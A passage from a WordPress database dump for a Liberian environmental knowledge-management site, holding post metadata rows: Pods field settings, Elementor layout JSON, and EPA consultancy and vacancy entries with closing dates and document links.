File'),(29734,4155,'file_wp_gallery_output','0'),(29735,4155,'file_wp_gallery_link','post'),(29736,4155,'file_wp_gallery_columns','1'),(29737,4155,'file_wp_gallery_random_sort','0'),(29738,4155,'file_wp_gallery_size','thumbnail'),(29739,4155,'oembed_width','0'),(29740,4155,'oembed_height','0'),(29741,4155,'oembed_show_preview','0'),(29742,4155,'oembed_restrict_providers','0'),(29743,4155,'oembed_enabled_providers_amazoncn','0'),(29744,4155,'oembed_enabled_providers_amazoncouk','0'),(29745,4155,'oembed_enabled_providers_amazoncom','0'),(29746,4155,'oembed_enabled_providers_amazoncomau','0'),(29747,4155,'oembed_enabled_providers_amazonin','0'),(29748,4155,'oembed_enabled_providers_animotocom','0'),(29749,4155,'oembed_enabled_providers_cloudupcom','0'),(29750,4155,'oembed_enabled_providers_crowdsignalcom','0'),(29751,4155,'oembed_enabled_providers_dailymotioncom','0'),(29752,4155,'oembed_enabled_providers_facebookcom','0'),(29753,4155,'oembed_enabled_providers_flickrcom','0'),(29754,4155,'oembed_enabled_providers_gfycatcom','0'),(29755,4155,'oembed_enabled_providers_icloudcom','0'),(29756,4155,'oembed_enabled_providers_imgurcom','0'),(29757,4155,'oembed_enabled_providers_issuucom','0'),(29758,4155,'oembed_enabled_providers_kickstartercom','0'),(29759,4155,'oembed_enabled_providers_loomcom','0'),(29760,4155,'oembed_enabled_providers_mesh','0'),(29761,4155,'oembed_enabled_providers_meetupcom','0'),(29762,4155,'oembed_enabled_providers_mixcloudcom','0'),(29763,4155,'oembed_enabled_providers_odeslico','0'),(29764,4155,'oembed_enabled_providers_redditcom','0'),(29765,4155,'oembed_enabled_providers_reverbnationcom','0'),(29766,4155,'oembed_enabled_providers_screencastcom','0'),(29767,4155,'oembed_enabled_providers_scribdcom','0'),(29768,4155,'oembed_enabled_providers_sketchfabcom','0'),(29769,4155,'oembed_enabled_providers_slidesharenet','0'),(29770,4155,'oembed_enabled_providers_smugmugcom','0'),(29771,4155,'oembed_enabled_providers_someecardscom','0'),(29772,4155,'oembed_enabled_providers_soundcloudcom','0'),(29773,4155,'oembed_enabled_providers_speakerdeckcom','0'),(29774,4155,'oembed_enabled_providers_spotifycom','0'),(29775,4155,'oembed_enabled_providers_tedcom','0'),(29776,4155,'oembed_enabled_providers_tiktokcom','0'),(29777,4155,'oembed_enabled_providers_tumblrcom','0'),(29778,4155,'oembed_enabled_providers_twittercom','0'),(29779,4155,'oembed_enabled_providers_vimeocom','0'),(29780,4155,'oembed_enabled_providers_wistiacom','0'),(29781,4155,'oembed_enabled_providers_wordpresscom','0'),(29782,4155,'oembed_enabled_providers_wordpresstv','0'),(29783,4155,'oembed_enabled_providers_youtubecom','0'),(29784,4155,'pick_format_type','single'),(29785,4155,'pick_format_single','dropdown'),(29786,4155,'pick_format_multi','checkbox'),(29787,4155,'pick_display_format_multi','default'),(29788,4155,'pick_display_format_separator',', '),(29789,4155,'pick_allow_add_new','1'),(29790,4155,'pick_taggable','0'),(29791,4155,'pick_show_icon','1'),(29792,4155,'pick_show_edit_link','1'),(29793,4155,'pick_show_view_link','1'),(29794,4155,'pick_limit','0'),(29795,4155,'pick_user_role','a:0:{}'),(29796,4155,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(29797,4155,'boolean_format_type','checkbox'),(29798,4155,'boolean_yes_label','Yes'),(29799,4155,'boolean_no_label','No'),(29800,4155,'admin_only','0'),(29801,4155,'restrict_role','0'),(29802,4155,'restrict_capability','0'),(29803,4155,'hidden','0'),(29804,4155,'read_only','0'),(29805,4155,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(29806,4155,'rest_read','0'),(29807,4155,'rest_write','0'),(29808,4155,'rest_pick_response','array'),(29809,4155,'rest_pick_depth','1'),(29810,3791,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-INDIVIDUAL-ASSESSMENT.docx'),(29811,4156,'_elementor_edit_mode','builder'),(29812,4156,'_elementor_template_type','single-post'),(29813,4156,'_elementor_version','3.4.0'),(29814,4156,'_elementor_pro_version','3.3.6'),(29815,4156,'_wp_page_template','default'),(29816,4156,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:20:\"single/ekms_bulletin\";s:10:\"preview_id\";s:4:\"3791\";}'),(29817,4156,'_elementor_data','[{\"id\":\"f09d1c7\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b0a14f\"}]},\"elements\":[{\"id\":\"5eb3e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5f7c8ef\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0435d20\"}]},\"elements\":[{\"id\":\"7941856\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ba5ef7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"3dc1769\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"c652bc2\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"2fbf64f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Posted: \",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"93c230f\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"0549fef\\\" name=\\\"pods-date\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aclosed_date%22%2C%22before%22%3A%22Closed%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"c661ccf\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"8259221\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22ekms_bulletin%3A2483%3Aowner%22%2C%22before%22%3A%22Posted%20by%3A%20%22%7D\\\"]\"}}],\"space_between\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":17,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29819,4156,'_elementor_conditions','a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}'),(29822,3789,'_wp_page_template','default'),(29823,3789,'closed_date','2021-08-18'),(29824,3789,'owner','Environmental Protection Agency'),(29825,3789,'vacancy_link','https://www.epa.gov.lr/sites/default/files/CCCD%20JINGLE%20AND%20PUBLIC%20SERVICE%20ANNOUNCEMENT.pdf'),(29826,3788,'_wp_page_template','default'),(29827,3788,'closed_date','2021-08-18'),(29828,3788,'owner','Environmental Protection Agency'),(29829,3788,'vacancy_link','https://www.epa.gov.lr/sites/default/files/CCCD%20PROJET%20CHIEF%20TECHNICAL%20ADVISOR%20%282%29.pdf'),(29830,3789,'_wp_old_date','2021-08-03'),(29831,4032,'_edit_lock','1629326342:38'),(29832,3789,'_wp_old_date','2021-07-23'),(29833,3788,'_wp_old_date','2021-08-03'),(29834,3787,'_wp_page_template','default'),(29835,3787,'_wp_old_date','2021-08-03'),(29836,3787,'closed_date','2021-08-18'),(29837,3787,'owner','Environmental Protection Agency'),(29838,3787,'vacancy_link','https://www.epa.gov.lr/sites/default/files/CCCD%20THEMATIC%20ASSESSMENT%20NCSA.pdf'),(29839,3707,'_wp_page_template','default'),(29840,3707,'closed_date','2021-04-30'),(29841,3707,'owner','Environmental Protection Agency'),(29842,3707,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-undertake-financial-and-economic-analysis-of-monitoring-enforcement-and-compliance-of-Rio-Convwntions-implementation.docx'),(29843,3706,'_wp_page_template','default'),(29844,3706,'closed_date','2021-04-30'),(29845,3706,'owner','Environmental Protection Agency'),(29846,3706,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/04/consultancy-to-review-the-Environmental-Knowledge-Management-System-EKMS-and-procure-addition-subscriptions-and-software.docx'),(29847,3705,'_wp_page_template','default'),(29848,3705,'closed_date','2021-04-30'),(29849,3705,'owner','Environmental Protection Agency'),(29850,3705,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-distribute-environmental-awareness-brochures-posters-and-fact-sheets-through-outdoor-drama-and-cultural-performances.docx'),(29851,3704,'_wp_page_template','default'),(29852,3704,'closed_date','2021-04-30'),(29853,3704,'owner','Environmental Protection Agency'),(29854,3704,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/04/CONSULTANCY-TO-DEVELOP-AWARENESS-MODULE-FOR-INSTITUTIONS-APRIL-2021.docx'),(29855,3698,'_wp_page_template','default'),(29856,3698,'closed_date','2021-04-30'),(29857,3698,'owner','Environmental Protection Agency'),(29858,3698,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-develop-a-15-years-Resource-Mobilization-Strategy-for-the-sustainability-of-the-Environmental-Knowledge-Management-System.docx'),(29859,3680,'_wp_page_template','default'),(29860,3680,'_wp_old_date','2021-04-08'),(29861,3680,'closed_date','2021-04-06'),(29862,3680,'owner','Environmental Protection Agency'),(29863,3680,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EPA-ACT-HARMONIZATION-MARCH-19-2021-CCCD.pdf'),(29864,3675,'_wp_page_template','default'),(29865,3675,'closed_date','2021-04-20'),(29866,3675,'owner','Environmental Protection Agency'),(29867,3675,'vacancy_link','https://emansion.gov.lr/doc/JOB%20OPPORTUNITY%20EPA%203.pdf'),(29868,3674,'_wp_page_template','default'),(29869,3674,'closed_date','2021-04-20'),(29870,3674,'owner','Environmental Protection Agency'),(29871,3674,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-LESSONS-LEARNED-TOR-MARCH-19-2021-CCCD.pdf'),(29872,3673,'_wp_page_template','default'),(29873,3673,'closed_date','2021-04-20'),(29874,3673,'owner','Environmental Protection Agency'),(29875,3673,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2021/04/FINAL-DRAFT-EKMS-CURRICULUM-MARCH-19-2021-CCCD.pdf'),(29876,3180,'_last_editor_used_jetpack','classic-editor'),(29877,3178,'_last_editor_used_jetpack','classic-editor'),(29878,3181,'_wp_page_template','default'),(29879,3181,'closed_date','2020-11-03'),(29880,3181,'owner','Environmental Protection Agency'),(29881,3181,'vacancy_link','https://epa.gov.lr/sites/default/files/Consultant%20CCCD%204.pdf'),(29882,3180,'_wp_page_template','default'),(29883,3180,'closed_date','2020-11-03'),(29884,3180,'owner','Environmental Protection Agency'),(29885,3180,'vacancy_link','https://epa.gov.lr/sites/default/files/National%20Consultant%20CCCD3.pdf'),(29886,3178,'_wp_page_template','default'),(29887,3178,'closed_date','2020-11-03'),(29888,3178,'owner','Environmental Protection Agency'),(29889,3178,'vacancy_link','https://www.epa.gov.lr/sites/default/files/National%20Consultant%20CCCD%202.pdf'),(29890,3175,'_last_editor_used_jetpack','classic-editor'),(29891,3175,'_wp_page_template','default'),(29892,3175,'closed_date','2020-11-03'),(29893,3175,'owner','Environmental Protection Agency'),(29894,3175,'vacancy_link','https://www.epa.gov.lr/sites/default/files/National%20Consultant%20CCCD.pdf'),(29895,3058,'_last_editor_used_jetpack','classic-editor'),(29896,3058,'_wp_page_template','default'),(29897,3058,'closed_date','2020-06-12'),(29898,3058,'owner','Environmental Protection Agency'),(29899,3058,'vacancy_link','https://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf'),(29900,3056,'_last_editor_used_jetpack','classic-editor'),(29901,3056,'_wp_page_template','default'),(29902,3056,'closed_date','2020-06-12'),(29903,3056,'owner','Environmental Protection Agency'),(29904,3056,'vacancy_link','http://www.epa.gov.lr/sites/default/files/Linkages%20Rio%20Conventions.pdf'),(29905,3055,'_last_editor_used_jetpack','classic-editor'),(29906,3055,'_wp_page_template','default'),(29907,3055,'closed_date','2020-06-12'),(29908,3055,'owner','Environmental Protection Agency'),(29909,3055,'vacancy_link','https://www.epa.gov.lr/sites/default/files/Production%20of%20updated%20codes.pdf'),(29926,3271,'_wp_page_template','default'),(29927,3271,'_pods_document_cover_image','a:1:{i:0;i:3569;}'),(29932,3271,'document_cover_image','3569'),(29933,3271,'attached_document','3272'),(29935,4185,'_elementor_edit_mode','builder'),(29936,4185,'_elementor_template_type','loop'),(29937,4185,'_elementor_version','3.4.0'),(29938,4185,'_elementor_pro_version','3.3.6'),(29939,4185,'_wp_page_template','default'),(29940,4185,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:15:\"single/document\";s:10:\"preview_id\";s:4:\"3541\";}'),(29941,4185,'_elementor_data','[{\"id\":\"97b774f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d196435\"}],\"background_background\":\"classic\",\"background_color\":\"#FFFFFFA8\"},\"elements\":[{\"id\":\"58e5283\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5fea59f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ef533a9\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"18398f5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"ec82dac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"left\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"766d5fb\",\"elType\":\"widget\",\"settings\":{\"view\":\"traditional\",\"icon_list\":[{\"type\":\"terms\",\"selected_icon\":{\"value\":\"far fa-user-circle\",\"library\":\"fa-regular\"},\"_id\":\"c35d24b\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"taxonomy\":\"resource_category\",\"text_prefix\":\"Category:\",\"show_icon\":\"none\"},{\"selected_icon\":{\"value\":\"fas fa-calendar\",\"library\":\"fa-solid\"},\"_id\":\"796caf9\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"text_prefix\":\"Uploaded:\",\"link\":\"\",\"show_icon\":\"none\"},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"_id\":\"b3c26a1\",\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Ayear%22%2C%22before%22%3A%22Year%20Published%3A%20%22%7D\\\"]\"}},{\"type\":\"custom\",\"selected_icon\":{\"value\":\"far fa-clock\",\"library\":\"fa-regular\"},\"custom_date_format\":\"F j, Y\",\"custom_time_format\":\"g:i a\",\"link\":\"\",\"show_icon\":\"none\",\"__dynamic__\":{\"custom_text\":\"[elementor-tag id=\\\"bede178\\\" name=\\\"pods-text\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Aby%22%2C%22before%22%3A%22By%3A%20%22%7D\\\"]\"},\"_id\":\"9db8e27\"}],\"space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"icon_align\":\"left\",\"divider_color\":\"#0A3C11\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":9,\"sizes\":[]},\"icon_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"post-info\"}],\"isInner\":true},{\"id\":\"4395636\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.832999999999998408384271897375583648681640625},\"elements\":[{\"id\":\"fce80b4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"d762b8d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22document%3A419%3Adocument_cover_image%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"1f55107\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"},\"align\":\"left\",\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29956,4187,'_elementor_edit_mode','builder'),(29957,4187,'_elementor_template_type','wp-page'),(29958,4187,'_elementor_version','3.4.0'),(29959,4187,'_wp_page_template','default'),(29960,4187,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(29962,4187,'_elementor_pro_version','3.3.6'),(29963,4188,'_elementor_edit_mode','builder'),(29964,4188,'_elementor_template_type','wp-page'),(29965,4188,'_elementor_version','3.4.0'),(29966,4188,'_wp_page_template','default'),(29967,4188,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.81400000000000005684341886080801486968994140625},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.186000000000007048583938740193843841552734375},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\",\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" 